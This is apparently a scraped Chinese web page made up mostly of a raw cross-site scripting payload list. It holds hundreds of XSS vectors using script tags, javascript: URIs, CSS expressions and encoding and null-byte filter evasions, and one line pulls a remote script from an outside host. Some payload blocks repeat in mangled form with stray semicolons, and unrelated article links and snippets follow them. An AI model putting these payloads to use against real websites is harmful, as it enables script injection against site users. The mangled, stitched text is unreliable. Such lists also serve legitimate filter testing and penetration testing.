<FRAMESET><FRAME SRC=\"javascript:alert(2116);\"></FRAMESET>
<STYLE>li {list-style-image: url(\"javascript:alert(2117)\");}</STYLE><UL><LI>XSS
perl -e 'print \"<SCR\0IPT>alert(2118)</SCR\0IPT>\";' > out
perl -e 'print \"<IMG SRC=java\0script:alert(2119)>\";' > out
<br size=\"&{alert(2120)}\">
<scrscriptipt>alert(2121)</scrscriptipt>
</br style=a:expression(alert(21222122>
</script><script>alert(2123)</script>
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(2124)>
[color=red width=expression(alert(2125))][color]
<BASE HREF="javascript:alert(2126);//">
"></iframe><script>alert(2128)</script>
<body onLoad="while(true) alert(2129);">
'"></title><script>alert(2130)</script>
</textarea>'"><script>alert(2131)</script>
'""><script language="JavaScript"> alert(2132);</script>
</script></script><<<<script><>>>><<<script>alert(2133)</script>
<INPUT TYPE="IMAGE" SRC="javascript:alert(2135);">
'></select><script>alert(2136)</script>
a="get";b="URL";c="javascript:";d="alert(2140);";eval(a+b+c+d);
='><script>alert(2141)</script>
<body background=javascript:'"><script>alert(2143)</script>></body>
">/XaDoS/><script>alert(2144)</script><script src="http://www.site.com/XSS.js"></script>
">/KinG-InFeT.NeT/><script>alert(2145)</script>
!--" /><script>alert(2148);</script>
<script>alert(2149)</script><marquee><h1>XSS by xss</h1></marquee>
"><script>alert(2150)</script>><marquee><h1>XSS by xss</h1></marquee>
'"></title><script>alert(2151)</script>><marquee><h1>XSS by xss</h1></marquee>
<img """><script>alert(2152)</script><marquee><h1>XSS by xss</h1></marquee>
<script>alert(2153)</script><marquee><h1>XSS by xss</h1></marquee>
"><script>alert(2154)</script>"><script>alert("XSS by \nxss</h1></marquee>
'"></title><script>alert(2155)</script>><marquee><h1>XSS by xss</h1></marquee>
<iframe src="javascript:alert(2156);"></iframe><marquee><h1>XSS by xss</h1></marquee>
'><SCRIPT>alert(2157))</SCRIPT><img src="" alt='
"><SCRIPT>alert(2158))</SCRIPT><img src="" alt="
\'><SCRIPT>alert(2159))</SCRIPT><img src="" alt=\'
'); alert(2162); var x='
\\'); alert(2163);var x=\'
//--></SCRIPT><SCRIPT>alert(2164));
>"><ScRiPt%20%0a%0d>alert(2165)%3B</ScRiPt>
<SCRIPT> alert(2170); </SCRIPT>
<BODY ONLOAD=alert(2171)>
<BODY BACKGROUND="javascript:alert(2172)">
<IMG SRC="javascript:alert(2173);">
<IMG DYNSRC="javascript:alert(2174)">
<IMG LOWSRC="javascript:alert(2175)">
<INPUT TYPE="IMAGE" SRC="javascript:alert(2177);">
<LINK REL="stylesheet" HREF="javascript:alert(2178);">
<TABLE BACKGROUND="javascript:alert(2179)">
<TD BACKGROUND="javascript:alert(2180)">
<DIV STYLE="background-image: url(javascript:alert(2181))">
<DIV STYLE="width: expression(alert(2182));">
';alert(2185))//\';alert(2185))//";alert(2185))//\";alert(2185))//--></SCRIPT>">'><SCRIPT>alert(2185))</SCRIPT>
<SCRIPT>alert(2187)</SCRIPT>
<SCRIPT>alert(2189))</SCRIPT>
<BASE HREF="javascript:alert(2190);//">
<BGSOUND SRC="javascript:alert(2191);">
<BODY BACKGROUND="javascript:alert(2192);">
<BODY ONLOAD=alert(2193)>
<DIV STYLE="background-image: url(javascript:alert(2194))">
<DIV STYLE="background-image: url(&#1;javascript:alert(2195))">
<DIV STYLE="width: expression(alert(2196));">
<FRAMESET><FRAME SRC="javascript:alert(2197);"></FRAMESET>
<IFRAME SRC="javascript:alert(2198);"></IFRAME>
<INPUT TYPE="IMAGE" SRC="javascript:alert(2199);">
<IMG SRC="javascript:alert(2200);">
<IMG SRC=javascript:alert(2201)>
<IMG DYNSRC="javascript:alert(2202);">
<IMG LOWSRC="javascript:alert(2203);">
<STYLE>li {list-style-image: url("javascript:alert(2207)");}</STYLE><UL><LI>XSS
%BCscript%BEalert(2211)%BC/script%BE
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(2212);">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(2214);">
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert(2217)></OBJECT>
a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert(2219);")";
eval(a+b+c+d);
<STYLE TYPE="text/javascript">alert(2220);</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert(2221))">
<XSS STYLE="xss:expression(alert(2222))">
<STYLE>.XSS{background-image:url("javascript:alert(2223)");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert(2224)")}</STYLE>
<LINK REL="stylesheet" HREF="javascript:alert(2225);">
<TABLE BACKGROUND="javascript:alert(2230)"></TABLE>
<TABLE><TD BACKGROUND="javascript:alert(2231)"></TD></TABLE>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert(2233);">]]>
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert(2234)"></B></I></XML>
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(2238)</SCRIPT>">
<BR SIZE="&{alert(2243)}">
<IMG SRC=JaVaScRiPt:alert(2244)>
<IMG SRC=javascript:alert(2245)>
<IMG SRC=`javascript:alert(2246)`>
<IMG SRC=javascript:alert(2247))>
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(2252);+ADw-/SCRIPT+AD4-
\";alert(2253);//
</TITLE><SCRIPT>alert(2254);</SCRIPT>
<STYLE>@im\port'\ja\vasc\ript:alert(2255)';</STYLE>
<IMG SRC="jav ascript:alert(2256);">
<IMG SRC="jav&#x09;ascript:alert(2257);">
<IMG SRC="jav&#x0A;ascript:alert(2258);">
<IMG SRC="jav&#x0D;ascript:alert(2259);">
perl -e 'print "<IMG SRC=java\0script:alert(2261)>";'> out
perl -e 'print "&<SCR\0IPT>alert(2262)</SCR\0IPT>";' > out
<IMG SRC=" &#14; javascript:alert(2263);">
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(2265)>
<IMG SRC="javascript:alert(2268)"
<<SCRIPT>alert(2270);//<</SCRIPT>
<IMG """><SCRIPT>alert(2271)</SCRIPT>">
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(2390)>
</script><script>alert(2391)</script>
</br style=a:expression(alert(23922392>
<scrscriptipt>alert(2393)</scrscriptipt>
<br size=\"&{alert(2394)}\">
perl -e 'print \"<IMG SRC=java\0script:alert(2395)>\";' > out
perl -e 'print \"<SCR\0IPT>alert(2396)</SCR\0IPT>\";' > out
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert(2397))>
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert(2399))>
<~/XSS STYLE=xss:expression(alert(2400))>
"><script>alert(2401)</script>
</XSS/*-*/STYLE=xss:e/**/xpression(alert(2402))>
XSS/*-*/STYLE=xss:e/**/xpression(alert(2403))>
XSS STYLE=xss:e/**/xpression(alert(2404))>
</XSS STYLE=xss:expression(alert(2405))>
';;alert(2406))//\';;alert(2406))//";;alert(2406))//\";;alert(2406))//-->;<;/SCRIPT>;";>;';>;<;SCRIPT>;alert(2406))<;/SCRIPT>;
<;SCRIPT>;alert(2408)<;/SCRIPT>;
<;SCRIPT>;alert(2410))<;/SCRIPT>;
<;BASE HREF=";javascript:alert(2411);//";>;
<;BGSOUND SRC=";javascript:alert(2412);";>;
<;BODY BACKGROUND=";javascript:alert(2413);";>;
<;BODY ONLOAD=alert(2414)>;
<;DIV STYLE=";background-image: url(javascript:alert(2415))";>;
<;DIV STYLE=";background-image: url(&;#1;javascript:alert(2416))";>;
<;DIV STYLE=";width: expression(alert(2417));";>;
<;FRAMESET>;<;FRAME SRC=";javascript:alert(2418);";>;<;/FRAMESET>;
<;IFRAME SRC=";javascript:alert(2419);";>;<;/IFRAME>;
<;INPUT TYPE=";IMAGE"; SRC=";javascript:alert(2420);";>;
<;IMG SRC=";javascript:alert(2421);";>;
<;IMG SRC=javascript:alert(2422)>;
<;IMG DYNSRC=";javascript:alert(2423);";>;
<;IMG LOWSRC=";javascript:alert(2424);";>;
<;STYLE>;li {list-style-image: url(";javascript:alert(2428)";);}<;/STYLE>;<;UL>;<;LI>;XSS
%BCscript%BEalert(2432)%BC/script%BE
<;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=javascript:alert(2433);";>;
<;META HTTP-EQUIV=";refresh"; CONTENT=";0; URL=http://;URL=javascript:alert(2435);";>;
<;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>;<;param name=url value=javascript:alert(2438)>;<;/OBJECT>;
a=";get";;&;#10;b=";URL(";";;&;#10;c=";javascript:";;&;#10;d=";alert(2440);";)";;
eval(a+b+c+d);
<;STYLE TYPE=";text/javascript";>;alert(2441);<;/STYLE>;
<;IMG STYLE=";xss:expr/*XSS*/ession(alert(2442))";>;
<;XSS STYLE=";xss:expression(alert(2443))";>;
<;STYLE>;.XSS{background-image:url(";javascript:alert(2444)";);}<;/STYLE>;<;A CLASS=XSS>;<;/A>;
<;STYLE type=";text/css";>;BODY{background:url(";javascript:alert(2445)";)}<;/STYLE>;
<;LINK REL=";stylesheet"; HREF=";javascript:alert(2446);";>;
<;TABLE BACKGROUND=";javascript:alert(2451)";>;<;/TABLE>;
<;TABLE>;<;TD BACKGROUND=";javascript:alert(2452)";>;<;/TD>;<;/TABLE>;
<;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC=";javas]]>;<;![CDATA[cript:alert(2454);";>;]]>;
<;XML ID=";xss";>;<;I>;<;B>;<;IMG SRC=";javas<;!-- -->;cript:alert(2455)";>;<;/B>;<;/I>;<;/XML>;
<;META HTTP-EQUIV=";Set-Cookie"; Content=";USERID=<;SCRIPT>;alert(2459)<;/SCRIPT>;";>;
<;BR SIZE=";&;{alert(2464)}";>;
<;IMG SRC=JaVaScRiPt:alert(2465)>;
<;IMG SRC=javascript:alert(2466)>;
<;IMG SRC=`javascript:alert(2467)`>;
<;IMG SRC=javascript:alert(2468))>;
<;HEAD>;<;META HTTP-EQUIV=";CONTENT-TYPE"; CONTENT=";text/html; charset=UTF-7";>; <;/HEAD>;+ADw-SCRIPT+AD4-alert(2473);+ADw-/SCRIPT+AD4-
\";;alert(2474);//
<;/TITLE>;<;SCRIPT>;alert(2475);<;/SCRIPT>;
<;STYLE>;@im\port';\ja\vasc\ript:alert(2476)';;<;/STYLE>;
<;IMG SRC=";jav ascript:alert(2477);";>;
<;IMG SRC=";jav&;#x09;ascript:alert(2478);";>;
<;IMG SRC=";jav&;#x0A;ascript:alert(2479);";>;
<;IMG SRC=";jav&;#x0D;ascript:alert(2480);";>;
perl -e ';print ";<;IM SRC=java\0script:alert(2482)>";;';>; out
perl -e ';print ";&;<;SCR\0IPT>;alert(2483)<;/SCR\0IPT>;";;'; >; out
<;IMG SRC="; &;#14; javascript:alert(2484);";>;
<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(2486)>;
<;IMG SRC=";javascript:alert(2489)";
<;<;SCRIPT>;alert(2491);//<;<;/SCRIPT>;
<;IMG ";";";>;<;SCRIPT>;alert(2492)<;/SCRIPT>;";>;
";>;<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(2611)>;
<;/script>;<;script>;alert(2612)<;/script>;
<;/br style=a:expression(alert(26132613>;
<;scrscriptipt>;alert(2614)<;/scrscriptipt>;
<;br size=\";&;{alert(2615)}\";>;
perl -e 'print \";<;IMG SRC=java\0script:alert(2616)>;\";;' >; out
perl -e 'print \";<;SCR\0IPT>;alert(2617)<;/SCR\0IPT>;\";;' >; out
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert(2618))>
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert(2620))>
<~/XSS STYLE=xss:expression(alert(2621))>
"><script>alert(2622)</script>
</XSS/*-*/STYLE=xss:e/**/xpression(alert(2623))>
XSS/*-*/STYLE=xss:e/**/xpression(alert(2624))>
XSS STYLE=xss:e/**/xpression(alert(2625))>
</XSS STYLE=xss:expression(alert(2626))>
>"><script>alert(2627)</script>&
"><STYLE>@import"javascript:alert(2628)";</STYLE>
>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(2629)>
>%22%27><img%20src%3d%22javascript:alert(2630)%22>
'%uff1cscript%uff1ealert(2631)%uff1c/script%uff1e'
<IMG SRC="javascript:alert(2633);">
<IMG SRC=javascript:alert(2634)>
<IMG SRC=JaVaScRiPt:alert(2635)>
<IMG SRC=JaVaScRiPt:alert(2636)>
<IMG SRC="jav
ascript:alert(2640);">
<IMG SRC="jav
ascript:alert(2641);">
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert(2643);<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
<script>alert(2649)</script>
%3cscript%3ealert(2650)%3c/script%3e
%22%3e%3cscript%3ealert(2651)%3c/script%3e
<IMG SRC="javascript:alert(2652);">
<IMG SRC=javascript:alert(2653)>
<IMG SRC=javascript:alert(2654)>
<img src=xss οnerrοr=alert(2655)>
<IMG """><SCRIPT>alert(2656)</SCRIPT>">
<IMG SRC=javascript:alert(2657))>
<IMG SRC="jav ascript:alert(2658);">
<IMG SRC="jav ascript:alert(2659);">
<BODY BACKGROUND="javascript:alert(2663)">
<BODY ONLOAD=alert(2664)>
<INPUT TYPE="IMAGE" SRC="javascript:alert(2665);">
<IMG SRC="javascript:alert(2666)"
<<SCRIPT>alert(2668);//<</SCRIPT>
%253cscript%253ealert(2669)%253c/script%253e
"><s"%2b"cript>alert(2670)</script>
foo<script>alert(2671)</script>
<scr<script>ipt>alert(2672)</scr</script>ipt>
';alert(2674))//\';alert(2674))//";alert(2674))//\";alert(2674))//--></SCRIPT>">'><SCRIPT>alert(2674))</SCRIPT>
<marquee onstart='javascript:alert(2675);'>=(◕_◕)=
</span></span><svg οnlοad="alert(2676)//“ #"="">
xss代码集的更多相关文章
- 【1】CommonCode快速代码集
阅读目录 CommonCode是什么? CommonCode包括哪些内容? 版本信息 回到顶部 CommonCode是什么? 简单的说,CommonCode是作者在经历各种"试错&quo ...
- XSS代码触发条件,插入XSS代码的常用方法
1.脚本插入 (1)插入javascript和vbscript正常字符. 例1:<img src=”javascript:alert(/xss/)”> 例2:<table backg ...
- yii过滤xss代码,防止sql注入
作者:白狼 出处:www.manks.top/article/yii2_filter_xss_code_or_safe_to_database 本文版权归作者,欢迎转载,但未经作者同意必须保留此段声明 ...
- C#连接六类数据库的代码集
本文列出了C#连接Access.SQL Server.Oracle.MySQL.DB2和SyBase六种不同数据库的程序源码和需要注意的点. 1.C#连接Access 程序代码: ;
- XSS代码注入框架
首先需要了解一下几点: 1.浏览器中Javascript变量的生命周期 Javascript变量的生命周期并不是你声明这个变量个窗口闭就被回收,只要有引用就会一直持续到浏览器关闭. 2.window对 ...
- Unity3D脚本--经常使用代码集
1. 訪问其他物体 1) 使用Find()和FindWithTag()命令 Find和FindWithTag是很耗费时间的命令,要避免在Update()中和每一帧都被调用的函数中使用.在Start() ...
- JavaWeb学习笔记--Servlet代码集
目录: 登录系统提交表单数据打开PDFCookieURL传递参数URL重写跟踪会话使用HttpSession对象跟踪会话Servlet间协作过滤器Filter 登录系统 <!DOCTYPE HT ...
- zencart 新页面调用好功能代码集:
其实很多就是看变量,就可以直接调用,而变量的定义地方很多,比如language 1. includes\languages\语言.php 2. 写个文件,放进includes\extra_confi ...
- Android基础工具函数代码集
整理在学习研究Android开发,编写了一些基本用到的工具集,现在整理分享(后续会持续更新,有问题还请指出). 1.HttpClient工具,使用Apache的HttpClient类实现get和pos ...
随机推荐
- [Note] CentOS 命令
1. uninstall software install by yum install yum install -y [package-name] //无-y则交互式安装 yum remove [p ...
- spring5 源码深度解析----- Spring事务 是怎么通过AOP实现的?(100%理解Spring事务)
此篇文章需要有SpringAOP基础,知道AOP底层原理可以更好的理解Spring的事务处理. 自定义标签 对于Spring中事务功能的代码分析,我们首先从配置文件开始人手,在配置文件中有这样一个配置 ...
- mybatis的环境搭建以及问题
1.mybatis中3个重要的类或者接口 1)SqlSessionFactoryBuilder类 用它来创建工厂对象,它重载了9次build()方法,我们常用build(inputstream)来创建 ...
- Java 操作Word表格——创建嵌套表格、添加/复制表格行或列、设置表格是否禁止跨页断行
本文将对如何在Java程序中操作Word表格作进一步介绍.操作要点包括 如何在Word中创建嵌套表格. 对已有表格添加行或者列 复制已有表格中的指定行或者列 对跨页的表格可设置是否禁止跨页断行 创建表 ...
- 微信开发中使用微信JSSDK和使用URL.createObjectURL上传预览图片的不同处理对比
在做微信公众号或者企业微信开发业务应用的时候,我们常常会涉及到图片预览.上传等的处理,往往业务需求不止一张图片,因此相对来说,需要考虑的全面一些,用户还需要对图片进行预览和相应的处理,在开始的时候我使 ...
- 安装高可用Hadoop生态 (一 ) 准备环境
为了学习Hadoop生态的部署和调优技术,在笔记本上的3台虚拟机部署Hadoop集群环境,要求保证HA,即主要服务没有单点故障,能够执行最基本功能,完成小内存模式的参数调整. 1. 准备环境 1 ...
- CSS中的各种单位
单位 描述 ...
- sublime text插件emmet自定义模板
首先要找到 snippets.json这个文件,路径是preferences>browse packages,看看有没有emmet目录. 如果没有,可能是您没有安装emmet插件,或者您安装了但 ...
- powershell下ssh客户端套件实现
有时会需要和Linux机器进行交互.所以这时就需要在Powershell中使用SSH. 0x01 查找Powershell中的SSH功能模块 如图,显示没有find-module的命令,需要安装Pac ...
- PMP(第六版)中的控制账户、规划包、工作包
PMP(第六版)中的控制账户.规划包.工作包 控制账户是一个管理控制点,在该控制点上,把范围.预算和进度加以整合,并与挣值比较,以测量绩效.控制账户拥有2个或以上的工作包,但每个工作包只与一个控制账户 ...